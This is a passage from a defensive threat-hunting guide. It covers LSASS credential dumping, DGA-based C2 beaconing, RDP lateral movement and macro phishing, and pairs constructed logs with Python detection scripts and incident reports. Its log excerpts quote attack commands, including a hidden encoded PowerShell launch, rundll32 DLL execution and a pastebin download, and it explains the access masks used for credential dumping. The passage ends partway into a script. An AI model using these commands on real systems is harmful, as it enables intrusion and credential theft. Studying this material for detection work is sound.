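    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\edr\sensor.exe",
}

# Constructed Sysmon Event ID 10 records modelled on the DC-01 event quoted above. The
# EDR and svchost rows are benign controls; the winlogon row is the same binary touching
# a different target and must not be reported as an LSASS finding.
EVENTS = [
    {"host": "DC-01", "ts": "2025-07-15 01:44:22", "user": "svc-backup", "signed": False,
     "source_image": r"c:\windows\temp\svcdiaghost.exe",
     "target_image": r"c:\windows\system32\lsass.exe", "granted_access": 0x1410},
    {"host": "DC-01", "ts": "2025-07-15 01:00:00", "user": "SYSTEM", "signed": True,
     "source_image": r"c:\program files\edr\sensor.exe",
     "target_image": r"c:\windows\system32\lsass.exe", "granted_access": 0x1010},
    {"host": "DC-02", "ts": "2025-07-15 01:05:00", "user": "SYSTEM", "signed": True,
     "source_image": r"c:\windows\system32\svchost.exe",
     "target_image": r"c:\windows\system32\lsass.exe", "granted_access": 0x1000},
    {"host": "DC-01", "ts": "2025-07-15 01:44:30", "user": "svc-backup", "signed": False,
     "source_image": r"c:\windows\temp\svcdiaghost.exe",
     "target_image": r"c:\windows\system32\winlogon.exe", "granted_access": 0x1410},
]


def decode_access(mask):
    """Human-readable rights in a GrantedAccess mask, lowest bit first."""
    if mask == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(ACCESS_BITS.items()) if mask & bit]


def can_read_memory(mask):
    """True when the handle allows reading the target's memory (what a dumper needs)."""
    return mask == PROCESS_ALL_ACCESS or bool(mask & 0x0010)


def hunt(events):
    """lsass.exe opened with memory-read rights by a process that is not on the allowlist."""
    findings = []
    for e in events:
        if not e["target_image"].lower().endswith("\\lsass.exe"):
            continue
        src = e["source_image"].lower()
        if src in ALLOWED_LSASS_READERS or not can_read_memory(e["granted_access"]):
            continue
        reasons = ["lsass_vm_read_by_non_allowlisted_process"]
        if e["granted_access"] in DUMPER_MASKS:
            reasons.append("known_dumper_access_mask")
        if not e.get("signed", False):
            reasons.append("unsigned_source")
        if re.search(r"\\(temp|users|programdata)\\", src):
            reasons.append("user_writable_path")
        findings.append({"host": e["host"], "ts": e["ts"], "user": e["user"],
                         "source_image": e["source_image"],
                         "granted_access": f"0x{e['granted_access']:x}",
                         "rights": decode_access(e["granted_access"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
```

Keying on PROCESS_VM_READ rather than on an exact mask list is deliberate: tooling changes the masks it requests, but it cannot read LSASS memory without that bit, so the exact-mask match is kept only as an extra reason for the analyst.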

3. ANALYSE

Investigation Summary:

1. Unusual Process on Domain Controller:
svcdiaghost.exe is not on any approved software list and appeared on DC-01 under a service account (svc-backup) that does not require interactive login.
2. Access to LSASS Memory:
Sysmon confirms it opened lsass.exe with access mask 0x1410 (PROCESS_VM_READ plus query rights), the combination needed to read process memory and the one commonly seen with Mimikatz-style credential dumping.
3. Unsigned and Suspicious Binary:
The binary is unsigned, was executed from C:\Windows\Temp and is flagged as malicious on VirusTotal.
4. Account Behaviour:
The account svc-backup shows an unusual interactive login. It normally runs scheduled jobs without any interactive logon.
5. No Prior Detection:
This was the first detection; no prior alerts were logged for this account or process, implying a new intrusion or lateral movement.

The evidence strongly suggests credential dumping was attempted using a malicious binary disguised as a system utility. The attacker likely compromised svc-backup and used it to deploy a Mimikatz variant on a domain controller.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Credential Dumping Attempt on Domain Controller
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversary may attempt to dump credentials by accessing LSASS
memory on privileged systems
• Findings:
o svcdiaghost.exe accessed lsass.exe on domain controller DC-01
o Unsigned binary executed by svc-backup, an account not authorised for
interactive use
o Command-line and behaviour match known credential dumping tools
(Mimikatz)
o VirusTotal scan confirmed malicious nature of binary
o No scheduled task or legitimate reason found for this execution
• MITRE Techniques Observed:
o T1003.001 (OS Credential Dumping: LSASS Memory)
o T1078 (Valid Accounts – service account misuse)
o T1055 (Process Injection) was part of the hypothesis but is not confirmed: only process access was observed, so injection should be confirmed or ruled out by memory analysis of the host
• Recommendations:
1. Disable the svc-backup account and rotate all service account credentials; because LSASS on a domain controller can hold material for every account that logged on there, treat those accounts as exposed and include a double reset of the krbtgt password
2. Isolate DC-01 from the network for forensic investigation
3. Search all endpoints for the presence of svcdiaghost.exe (by hash as well as by name)
4. Deploy detection rules for access to lsass.exe by non-authorised processes (Sysmon Event ID 10 with PROCESS_VM_READ in GrantedAccess)
5. Enable LSA protection (RunAsPPL) on domain controllers so that unsigned, non-protected processes cannot open lsass.exe
6. Enable Credential Guard on privileged member servers and workstations (Credential Guard is not supported on domain controllers themselves; LSA protection is the control there)
• Next Steps:
o Escalate to Incident Response for full containment and investigation
o Update EDR policies to auto-block similar LSASS access attempts
o Conduct AD audit to ensure no other compromised service accounts exist
o Deploy threat hunting queries across all domain controllers
SCENARIO 5: DOMAIN GENERATION ALGORITHM (DGA)-BASED C2 BEACONING

Background: Threat intelligence team reports a known malware family in the region is using
Domain Generation Algorithm (DGA) domains for command and control (C2)
communication. DGA domains are pseudo-randomly generated and used by malware to
evade static domain blocking. The SOC launches a proactive threat hunt to detect such C2
activity in the environment.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An infected endpoint is communicating with DGA-generated domains to maintain contact with its command-and-control server, which may indicate an ongoing or staged compromise.

TTP Reference (MITRE ATT&CK):

• T1071.004: Application Layer Protocol – DNS
• T1568.002: Dynamic Resolution – Domain Generation Algorithms
• T1008: Fallback Channels
• T1105: Ingress Tool Transfer

Scope of Hunt:

• Timeframe: Last 14 days
• Data sources: DNS logs, firewall logs, proxy logs, threat intel feeds
• Focus: Workstations and servers with unusual DNS query patterns

Telemetry to Review:

• DNS requests per endpoint
• Entropy or randomness score per queried domain
• Frequency and volume of unique DNS queries, and NXDOMAIN rate per host
• Newly observed domains not in the corporate allowlist
• EDR alerts on post-DNS activity

2. EXECUTE

DNS Logs from Endpoint (HR-WS-32):

Timestamp: 2025-07-14 13:22:01
Source IP: 10.10.34.78
Queried Domain: xf3ziueqpp.com
Query Type: A
Response: NXDOMAIN
Resolution Time: 25 ms
---
Timestamp: 2025-07-14 13:22:21
Domain: bns83eqkdsm.org
Response: NXDOMAIN
---
Timestamp: 2025-07-14 13:23:01
Domain: aepq9982jkl.co
Response: NXDOMAIN

Pattern:

• 60+ NXDOMAIN responses from the same host in 5 minutes
• Each domain label is under 12 characters, alphanumeric and not a dictionary word
• No matches in the known-good allowlist
• Domain entropy score (normalised): >0.98

Firewall Log:

• No connections followed the NXDOMAIN queries (there was nothing to connect to), but outbound HTTP/HTTPS was attempted as soon as one generated domain resolved to a valid IP

EDR Telemetry:

• Process: svchost.exe
• Network: Attempted HTTP POST to vbn9ezqmnm.biz
• File dropped: update-checker.dll in C:\Users\Public\Downloads
• File hash flagged by 7/71 engines on VirusTotal

Threat Intel Lookup:

• DGA patterns consistent with malware family: Pykspa variant
• Infrastructure linked to known botnet nodes
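The pattern the logs above describe (many failed lookups of random-looking names from one host within minutes, then one that resolves) can be checked across the whole DNS log with little code. The Python below is an added example, not code from the original document: it scores domain labels with Shannon entropy plus two cheap features (digits mixed into the label, few vowels), counts NXDOMAIN answers for such names per host in a sliding five-minute window, and lists any such name that did resolve as a C2 candidate. The allowlist, the thresholds, the benign second host and the resolved address are assumptions; the burst is constructed to mirror the HR-WS-32 queries quoted above, with the three quoted domains included and the remainder generated from a seeded random source.

```python
import math
import random
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed corporate allowlist of known-good domains (exact match or parent domain).
ALLOWLIST = {"microsoft.com", "microsoftonline.com", "office.com", "windowsupdate.com",
             "google.com", "corp.example"}


def label_entropy(label):
    """Shannon entropy, in bits per character, of a domain label."""
    n = len(label)
    counts = {}
    for ch in label:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def registrable_label(domain):
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_allowlisted(domain):
    d = domain.lower().rstrip(".")
    return d in ALLOWLIST or any(d.endswith("." + a) for a in ALLOWLIST)


def looks_generated(domain, min_entropy=2.5):
    """Cheap DGA heuristic: not allowlisted, a longish label, random-looking (high entropy)
    and either digits mixed in or very few vowels. A production detector would add an
    n-gram or dictionary model; this is enough to separate the quoted queries from
    ordinary names."""
    if is_allowlisted(domain):
        return False
    label = registrable_label(domain)
    if len(label) < 7:
        return False
    has_digit = any(ch.isdigit() for ch in label)
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return label_entropy(label) >= min_entropy and (has_digit or vowel_ratio < 0.25)


def build_sample():
    """Constructed DNS records mirroring the HR-WS-32 burst above: 60 generated-looking
    NXDOMAIN queries at 5-second spacing (the three quoted domains first), one generated
    name that resolves, and ordinary traffic from a second host. Addresses are from the
    documentation ranges."""
    rng = random.Random(2025)
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    quoted = ["xf3ziueqpp.com", "bns83eqkdsm.org", "aepq9982jkl.co"]
    start = datetime(2025, 7, 14, 13, 22, 1)
    rows = []
    for i in range(60):
        if i < len(quoted):
            domain = quoted[i]
        else:
            label = "".join(rng.choice(alphabet) for _ in range(rng.randint(9, 11)))
            domain = label + rng.choice([".com", ".org", ".co", ".biz"])
        rows.append({"host": "HR-WS-32", "ts": start + timedelta(seconds=5 * i),
                     "domain": domain, "rcode": "NXDOMAIN", "answer": None})
    rows.append({"host": "HR-WS-32", "ts": start + timedelta(minutes=4, seconds=29),
                 "domain": "vbn9ezqmnm.biz", "rcode": "NOERROR", "answer": "203.0.113.45"})
    for i, d in enumerate(["www.microsoft.com", "login.microsoftonline.com",
                           "www.google.com", "wwww.corp-intranet.local"]):
        typo = d.startswith("wwww")
        rows.append({"host": "ENG-WS-05", "ts": start + timedelta(minutes=i), "domain": d,
                     "rcode": "NXDOMAIN" if typo else "NOERROR",
                     "answer": None if typo else "198.51.100.7"})
    return rows


SAMPLE = build_sample()


def hunt(records, window=timedelta(minutes=5), min_nxdomain=20):
    """Per host: the largest count of NXDOMAIN answers for generated-looking names inside
    any sliding window, plus any generated-looking name that did resolve (C2 candidate)."""
    by_host = defaultdict(list)
    for r in records:
        if looks_generated(r["domain"]):
            by_host[r["host"]].append(r)
    findings = []
    for host, rows in sorted(by_host.items()):
        nx = sorted((r for r in rows if r["rcode"] == "NXDOMAIN"), key=lambda r: r["ts"])
        peak, start = 0, 0
        for end in range(len(nx)):
            while nx[end]["ts"] - nx[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_nxdomain:
            resolved = sorted((r["domain"], r["answer"]) for r in rows if r["rcode"] == "NOERROR")
            findings.append({"host": host, "peak_nxdomain_in_window": peak,
                             "resolved_candidates": resolved})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE):
        print(finding)
```

Entropy on its own is a weak signal (long legitimate names such as "microsoftonline" score as high as generated ones), which is why the label features and the per-host NXDOMAIN rate carry the decision here, and why the allowlist is checked first. The resolved candidates are the pivot into the firewall and EDR data described above.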

3. ANALYSE

Key Findings:

1. Excessive NXDOMAIN Requests:
DNS logs reveal a high volume of failed queries to randomly generated domains. Normal systems do not exhibit this pattern, especially in such short intervals.
2. Entropy and Non-Dictionary Domains:
Domains queried are high-entropy, non-human-readable and are not associated
with any known legitimate services or CDNs.
3. EDR Detection of Suspicious POST Request:
One domain (vbn9ezqmnm.biz) resolved successfully and was contacted via
svchost.exe making a POST request, which is abnormal for that process.
4. Dropped File Indicators:
The dropped file update-checker.dll appears in a public folder, flagged as
suspicious and unrelated to any known patching agent.

The endpoint HR-WS-32 is likely infected with a malware that uses DGA for beaconing.
While most domains failed to resolve (NXDOMAIN), one successful hit indicates active C2
communication, possibly downloading payloads or awaiting further instructions.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – DGA-Based Beaconing Detected on Host HR-WS-32
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Malicious software on endpoint may be using DGA to attempt C2
communication with attacker infrastructure
• Findings:
o Over 60 unique, high-entropy DNS queries from HR-WS-32 in short time
window
o Domains not in whitelist, returned NXDOMAIN responses except one
o EDR confirmed svchost.exe made outbound connection to resolved domain
and downloaded DLL
o Threat intel linked the domain and DGA pattern to known Pykspa botnet
family
• MITRE Techniques Observed:
o T1568.002 (Dynamic Resolution: Domain Generation Algorithms)
o T1071.004 (Application Layer Protocol: DNS)
o T1105 (Ingress Tool Transfer)
o Possible abuse of a service hosted by svchost.exe (T1543.003, Windows Service) or injection into it (T1055), since the POST originated from svchost.exe; not confirmed until the image path, signature and loaded modules of that process are checked
• Recommendations:
1. Isolate host HR-WS-32 immediately
2. Submit update-checker.dll for deep malware analysis
3. Block outbound DNS requests to high-entropy, non-allowlisted domains
4. Implement rate-limiting or alerting on NXDOMAIN frequency per host
5. Reimage affected host if malware confirmed
6. Deploy DNS tunneling and DGA detection algorithms in DNS security
platform
• Next Steps:
o Cross-check DNS logs across all hosts for same DGA domain pattern
o Share detection logic with threat intel feeds
o Build SIEM use case for high-frequency NXDOMAIN anomalies
SCENARIO 6: LATERAL MOVEMENT USING REMOTE DESKTOP PROTOCOL (RDP) WITH
STOLEN CREDENTIALS

Background: SOC receives a brute-force detection alert for RDP login attempts to a
domain-joined workstation. The alert indicates successful login after several failed
attempts. SOC suspects lateral movement using stolen or brute-forced credentials and
launches a threat hunt to uncover the extent of compromise.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker has gained access to a valid domain user account and is moving
laterally through the network using RDP to access multiple systems.

TTP Reference (MITRE ATT&CK):

• T1078: Valid Accounts
• T1021.001: Remote Services – Remote Desktop Protocol
• T1059.001: Command and Scripting Interpreter – PowerShell
• T1087: Account Discovery
• T1047: Windows Management Instrumentation (WMI)

Scope of Hunt:

• Timeframe: Past 7 days
• Data sources: Windows Security Event Logs, Sysmon logs, EDR logs, Active Directory logs
• Target: Domain workstations and servers receiving inbound RDP from newly compromised hosts

Telemetry to Review:

• Event ID 4625 (Logon Failed) and 4624 (Logon Success – Type 10)
• Network connections from new RDP clients
• Account usage anomalies (logins from multiple systems)
• EDR for PowerShell/WMI execution post-RDP

2. EXECUTE

Windows Event Logs – RDP Brute Force and Success:

Event ID 4625 (Failed Logon):

Date: 2025-07-18 01:12:34
Account: temp_admin
Source IP: 10.10.22.88
Failure Reason: Unknown user name or bad password
Failure Count: 15 attempts in 5 minutes

Event ID 4624 (Successful Logon):

Date: 2025-07-18 01:19:11
Account: temp_admin
Source IP: 10.10.22.88
Logon Type: 10 (RemoteInteractive)
Workstation: ENG-WS-22

Lateral Movement Observation:

• From ENG-WS-22, the same account logs in via RDP to:
o FIN-WS-03 at 01:30
o HR-WS-09 at 01:44
• No interactive use of temp_admin before this date

EDR Logs – Post-Login Actions:

Host: HR-WS-09
Process Created: powershell.exe
Command Line: powershell -enc JAB...
Observed downloading a script from pastebin.com
Process Parent: explorer.exe (launched inside the RDP session; mstsc.exe is the client and runs on the connecting host, not the target)
User: temp_admin

AD Logs – Unusual Group Enumeration:

User: temp_admin
Queried domain group memberships via WMI
Queried logged-on users on multiple hosts using PowerShell remoting

Timing and Network Context:

• Activity occurred during the midnight shift
• The source IP address is internal, indicating a pivot from an already compromised host
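The Execute findings above are two patterns laid end to end: a burst of 4625 failures followed by a 4624 from the same source, then further type-10 logons whose source address belongs to a host the account had just reached. The Python below is an added example, not code from the original document: it joins failures to the success that follows them within a ten-minute window and then walks the account's subsequent RDP logons, marking a hop as lateral when it originates from a host already in the chain. The host-to-address mapping, the thresholds and the benign control user are assumptions; the events are constructed to mirror the logs quoted above.

```python
from datetime import datetime, timedelta

# Assumed host-to-address mapping, used to turn a logon's source IP into the host it
# came from (the previous hop in an RDP chain).
HOST_IP = {"ENG-WS-22": "10.10.40.22", "FIN-WS-03": "10.10.41.3", "HR-WS-09": "10.10.42.9"}


def ev(stamp, event_id, account, src_ip, host, logon_type=10):
    return {"ts": datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"), "id": event_id,
            "account": account, "src_ip": src_ip, "host": host, "logon_type": logon_type}


def build_sample():
    """Constructed Security events mirroring the quoted logs: 15 failures in five minutes,
    a success from the same source, two RDP hops from ENG-WS-22, and a benign user who
    mistypes a password twice (a control that must not fire)."""
    rows = []
    first_fail = datetime(2025, 7, 18, 1, 12, 34)
    for i in range(15):
        stamp = (first_fail + timedelta(seconds=20 * i)).strftime("%Y-%m-%d %H:%M:%S")
        rows.append(ev(stamp, 4625, "temp_admin", "10.10.22.88", "ENG-WS-22"))
    rows += [
        ev("2025-07-18 01:19:11", 4624, "temp_admin", "10.10.22.88", "ENG-WS-22"),
        ev("2025-07-18 01:30:00", 4624, "temp_admin", HOST_IP["ENG-WS-22"], "FIN-WS-03"),
        ev("2025-07-18 01:44:00", 4624, "temp_admin", HOST_IP["ENG-WS-22"], "HR-WS-09"),
        ev("2025-07-18 08:00:10", 4625, "aina", "10.10.5.7", "ENG-WS-22"),
        ev("2025-07-18 08:00:30", 4625, "aina", "10.10.5.7", "ENG-WS-22"),
        ev("2025-07-18 08:00:50", 4624, "aina", "10.10.5.7", "ENG-WS-22"),
    ]
    return rows


EVENTS = build_sample()


def brute_force_then_success(events, min_failures=10, window=timedelta(minutes=10)):
    """RemoteInteractive successes preceded, within the window, by many failures for the
    same account from the same source address."""
    out = []
    for s in events:
        if s["id"] != 4624 or s["logon_type"] != 10:
            continue
        fails = [f for f in events if f["id"] == 4625 and f["account"] == s["account"]
                 and f["src_ip"] == s["src_ip"] and s["ts"] - window <= f["ts"] < s["ts"]]
        if len(fails) >= min_failures:
            out.append({"account": s["account"], "src_ip": s["src_ip"], "host": s["host"],
                        "ts": s["ts"], "failures_before": len(fails)})
    return out


def rdp_chain(events, account, start, reached, horizon=timedelta(hours=2)):
    """Type-10 logons for the account after `start`, each linked to the host its source IP
    belongs to. A hop whose origin is a host the account already reached is lateral."""
    ip_to_host = {ip: h for h, ip in HOST_IP.items()}
    hops = sorted((e for e in events if e["id"] == 4624 and e["logon_type"] == 10
                   and e["account"] == account and start < e["ts"] <= start + horizon),
                  key=lambda e: e["ts"])
    reached = set(reached)
    chain = []
    for e in hops:
        origin = ip_to_host.get(e["src_ip"], e["src_ip"])
        chain.append({"ts": e["ts"].strftime("%H:%M"), "from": origin, "to": e["host"],
                      "lateral": origin in reached})
        reached.add(e["host"])
    return chain


def hunt(events):
    """Brute-force-then-success, enriched with the RDP hops that followed it."""
    findings = []
    for bf in brute_force_then_success(events):
        chain = rdp_chain(events, bf["account"], bf["ts"], {bf["host"]})
        findings.append({**bf, "ts": bf["ts"].strftime("%Y-%m-%d %H:%M:%S"),
                         "subsequent_rdp": chain,
                         "lateral_hops": sum(h["lateral"] for h in chain)})
    return findings


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
```

The chain output is the list of hosts to isolate in the Communicate step, and the "from" field is what distinguishes a pivot (origin already in the chain) from an unrelated logon by the same account.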

3. ANALYSE

Summary of Findings:
1. Credential Misuse Detected:
temp_admin saw 15 failed logons in 5 minutes from 10.10.22.88, followed by a successful
logon from the same IP. That pattern is a successful password-guessing attack (stolen or
cracked credentials), not a user mistyping a password.
2. Lateral Movement Pattern:
RDP logons from ENG-WS-22 to FIN-WS-03 and HR-WS-09 within 30 minutes show
coordinated movement. Logon Type 10 (RemoteInteractive) is consistent with RDP. Note
that with Network Level Authentication enabled, the failed attempts are usually logged as
Logon Type 3, so a brute-force correlation must not filter the 4625 events by Logon Type 10.
3. Command Execution:
EDR shows that after the RDP session on HR-WS-09, PowerShell ran an encoded script
and enumerated domain groups and logged-on users, typical post-access reconnaissance.
4. Tool Download via Pastebin:
PowerShell pulled a script from pastebin.com, likely a second-stage payload or
reconnaissance module; the content should be recovered from proxy or EDR file telemetry.
5. No Legitimate Purpose:
temp_admin was not in recent use and has no audit trail before this date. Its appearance
on three endpoints within about an hour is abnormal.

This is a clear case of credential misuse and lateral movement via RDP, followed by
reconnaissance and possible payload staging using PowerShell.
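The correlation described in findings 1 and 2, written out as an added example that is not part of the original document: it groups 4625/4624 events by account and source IP, reports a hit when a run of failures is followed by a success inside a time window, and then lists the Logon Type 10 hops the same account makes afterwards. The records are constructed to mirror the scenario (10.10.30.22 as the address of ENG-WS-22 and the benign svc_backup/jdoe entries are assumptions); in production the same logic runs over an EVTX or SIEM export. Because NLA logs failed RDP attempts as Logon Type 3, the failure side of the correlation deliberately ignores logon type.

```python
"""Correlate Windows Security events into a 'brute force then success' hit for one
account/source pair, then follow the RDP (Logon Type 10) hops that account makes
afterwards. Example code added for this page, not from the original document; the
records below are constructed to mirror the scenario and are not real logs."""
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"


def _ev(time, event_id, account, source_ip, logon_type, host, workstation=""):
    """A flattened Security event as a SIEM or EVTX parser would export it.
    host = computer that logged the event (the target); workstation = client name."""
    return {"time": time, "event_id": event_id, "account": account, "source_ip": source_ip,
            "logon_type": logon_type, "host": host, "workstation": workstation}


SAMPLE_EVENTS = []
# 15 failures in under five minutes. With Network Level Authentication the failed RDP
# attempts arrive as 4625 with Logon Type 3, not 10, so do not filter 4625s by type.
_base = datetime(2025, 7, 18, 1, 12, 34)
for i in range(15):
    SAMPLE_EVENTS.append(_ev((_base + timedelta(seconds=20 * i)).strftime(FMT), 4625,
                             "temp_admin", "10.10.22.88", 3, "ENG-WS-22"))
SAMPLE_EVENTS += [
    _ev("2025-07-18 01:19:11", 4624, "temp_admin", "10.10.22.88", 10, "ENG-WS-22"),
    # 10.10.30.22 is an assumed address for ENG-WS-22, the pivot host
    _ev("2025-07-18 01:30:02", 4624, "temp_admin", "10.10.30.22", 10, "FIN-WS-03", "ENG-WS-22"),
    _ev("2025-07-18 01:44:17", 4624, "temp_admin", "10.10.30.22", 10, "HR-WS-09", "ENG-WS-22"),
    # benign noise (assumed): a service logon and a user who mistyped a password twice
    _ev("2025-07-18 01:25:00", 4624, "svc_backup", "10.10.5.5", 3, "FIN-WS-03", "BACKUP-01"),
    _ev("2025-07-18 08:02:10", 4625, "jdoe", "10.10.40.12", 2, "FIN-WS-03"),
    _ev("2025-07-18 08:02:31", 4625, "jdoe", "10.10.40.12", 2, "FIN-WS-03"),
    _ev("2025-07-18 08:02:50", 4624, "jdoe", "10.10.40.12", 2, "FIN-WS-03", "FIN-WS-03"),
]


def _ts(event):
    return datetime.strptime(event["time"], FMT)


def bruteforce_then_success(events, fail_threshold=10, window=timedelta(minutes=10)):
    """Hits where >= fail_threshold 4625s for one (account, source_ip) fall inside `window`
    before a 4624 for the same pair. A success resets the failure counter."""
    by_pair = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_pair[(e["account"], e["source_ip"])].append(e)
    hits = []
    for (account, source_ip), evs in by_pair.items():
        fail_times = []
        for e in evs:
            if e["event_id"] == 4625:
                fail_times.append(_ts(e))
            elif e["event_id"] == 4624:
                recent = [t for t in fail_times if _ts(e) - t <= window]
                if len(recent) >= fail_threshold:
                    hits.append({"account": account, "source_ip": source_ip,
                                 "failures": len(recent), "first_failure": recent[0].strftime(FMT),
                                 "success_time": e["time"], "logon_type": e["logon_type"],
                                 "host": e["host"]})
                fail_times = []
    return hits


def rdp_hops(events, account, since):
    """(time, from, to) for every RemoteInteractive logon of `account` at or after `since`."""
    start = datetime.strptime(since, FMT)
    return [(e["time"], e["workstation"] or e["source_ip"], e["host"])
            for e in sorted(events, key=_ts)
            if e["event_id"] == 4624 and e["account"] == account
            and e["logon_type"] == 10 and _ts(e) >= start]


def hunt(events, **kwargs):
    """Brute-force hits with the RDP chain that followed each success attached."""
    hits = bruteforce_then_success(events, **kwargs)
    for h in hits:
        h["rdp_hops"] = rdp_hops(events, h["account"], h["success_time"])
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f"{h['account']} from {h['source_ip']}: {h['failures']} failures then success "
              f"at {h['success_time']} (type {h['logon_type']}) on {h['host']}")
        for t, src, dst in h["rdp_hops"]:
            print(f"  {t}  {src} -> {dst}")
```

Tune fail_threshold and window to the environment. The counter resets on success, so a second success from the same source after the run will not re-alert; pair the hit with the RDP-hop listing rather than relying on the count alone.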

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Lateral Movement Using RDP and Stolen Credentials
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Threat actor may be using compromised domain credentials to pivot
via RDP across internal systems
• Findings:
o Brute-force pattern detected followed by successful RDP login with
temp_admin
o Lateral RDP connections observed to multiple endpoints within a short time
o PowerShell scripts executed post-login to enumerate users and groups
o External script download attempted from pastebin, indicating potential tool
staging
o No authorised task associated with the use of temp_admin on these systems
• MITRE Techniques Observed:
o T1110.001 (Brute Force: Password Guessing)
o T1078 (Valid Accounts)
o T1021.001 (Remote Services: Remote Desktop Protocol)
o T1087 (Account Discovery)
o T1059.001 (Command and Scripting Interpreter: PowerShell)
• Recommendations:
1. Disable and reset password for temp_admin
2. Audit and remove dormant admin accounts across the domain
3. Isolate affected endpoints: ENG-WS-22, FIN-WS-03, HR-WS-09
4. Block outbound access to pastebin.com and similar sites on user endpoints
5. Enable MFA or restrict RDP access to privileged jump servers only
6. Deploy alerts for repeated 4625 events followed by a 4624 (Logon Type 10) from the
same source, and for encoded PowerShell launched inside RDP sessions
• Next Steps:
o Escalate to IR for full triage
o Review firewall and DNS logs for any further outbound C2 activity
o Integrate detection rules into SIEM for the brute force + lateral movement combination

SCENARIO 7: INITIAL ACCESS VIA MALICIOUS EMAIL ATTACHMENT (PHISHING WITH
MACRO-ENABLED WORD DOCUMENT)

Background: The SOC receives a report from the email security gateway showing multiple
users received an email from a spoofed internal domain. The attachment is a .docm
(macro-enabled Word file) and one user opened the file. No alerts were triggered by
antivirus or EDR, prompting a manual threat hunt to determine whether execution led to
compromise.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: A phishing email was used to deliver a malicious macro-enabled document. A
user executed the macro, which led to initial access for the attacker, possibly launching
PowerShell or other malicious tools.

TTP Reference (MITRE ATT&CK):

• T1566.001: Phishing – Spearphishing Attachment
• T1204.002: User Execution – Malicious File (the user opens the document and the macro
runs; a macro is not T1203 Exploitation for Client Execution, since no vulnerability is
exploited)
• T1059.005: Command and Scripting Interpreter – Visual Basic (the macro itself)
• T1059.001: Command and Scripting Interpreter – PowerShell
• T1055: Process Injection
• T1105: Ingress Tool Transfer

Scope of Hunt:

• Timeframe: Last 5 days
• Target: All endpoints that received the phishing email
• Data sources: Email logs, EDR telemetry, Office macro logs (if available), Sysmon
• Focus: User who opened the file (finance_exec01) on host FIN-WS-04

Telemetry to Review:

• Email headers and attachment metadata
• Process creation logs (macro spawning PowerShell or CMD)
• Child processes of winword.exe
• Network connections from user workstation

2. EXECUTE

Email Security Log:

Date: 2025-07-17 10:12:20
From: ceo@company-update[.]com
To: [email protected]
Subject: Salary Adjustment FY2025
Attachment: salary_update_fy2025.docm
SPF: fail
DKIM: fail
Detected by Gateway: Low reputation, not quarantined (initial rule set to alert only)

Endpoint EDR Logs (FIN-WS-04):

Process Tree:

winword.exe
└── powershell.exe -nop -w hidden -exec bypass -enc SQBmACgAJAB...
└── rundll32.exe launch.dll,EntryPoint

Sysmon Event ID 1 – Process Creation:

Date: 2025-07-17 10:13:04
Parent Process: winword.exe
Command Line: powershell.exe -w hidden -enc <base64 encoded>
User: finance_exec01
SHA256: abcd1234... (hash of the decoded PowerShell script, which matches a known
malware signature on VirusTotal; the powershell.exe image itself is unchanged)

Sysmon Event ID 3 – Network Connection:

Process: rundll32.exe
Destination: 89.45.78.120
Port: 443
Protocol: TCP
Country: Netherlands

EDR Detection:

• PowerShell launched by an Office application
• Encoded command executed
• DLL dropped in C:\Users\Public\Loader\launch.dll
• File hash flagged by 33/71 engines on VirusTotal
• Suspicious TLS connection established via rundll32.exe

3. ANALYSE

Findings:
1. Email as Entry Point:
The email came from a lookalike domain (company-update.com) and failed both SPF and
DKIM, but the gateway rule was set to alert only, so the message was delivered instead of
quarantined. The attachment was a .docm file.
2. Execution of Malicious Macro:
The user opened the file and the macro ran; winword.exe launched PowerShell with a
base64-encoded command that wrote launch.dll to C:\Users\Public\Loader and executed it
with rundll32.exe.
3. External Communication:
rundll32.exe, hosting the DLL, opened an HTTPS connection to 89.45.78.120, an IP with no
business justification that is tied to malware infrastructure.
4. AV and EDR:
Antivirus did not block the chain because of the evasion techniques used (encoded
PowerShell and a signed Windows binary hosting the DLL). EDR flagged the behaviour only
after the execution chain had completed.
5. Scope Limitation:
Only one user is confirmed to have opened the file. No lateral movement has been
observed so far.

The user executed a malicious macro that gave the attacker code execution and remote
access through the dropped DLL. This is initial access and will lead to further exploitation if
not contained.
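A small hunting script for the Office-to-PowerShell chain above, added as an example here and not taken from the original document: it flags any Office parent spawning a script host, records the suspicious switches, and decodes the -EncodedCommand blob (base64 over UTF-16LE, which is why a plain base64 decode shows interleaved null bytes). The Sysmon-style records are constructed; the encoded command is built from an assumed stage-2 downloader pointing at the page's 89.45.78.120, since the blob on the page is truncated and cannot be decoded.

```python
"""Flag Office applications that spawn script hosts, and decode PowerShell
-EncodedCommand arguments (base64 of a UTF-16LE string) so the hunter can read them.
Example code added for this page, not from the original document. The Sysmon-style
records are constructed; the encoded blob is built here from an assumed stage-2
command, not decoded from the page's truncated 'SQBmACgAJAB...' value."""
import base64
import ntpath
import re

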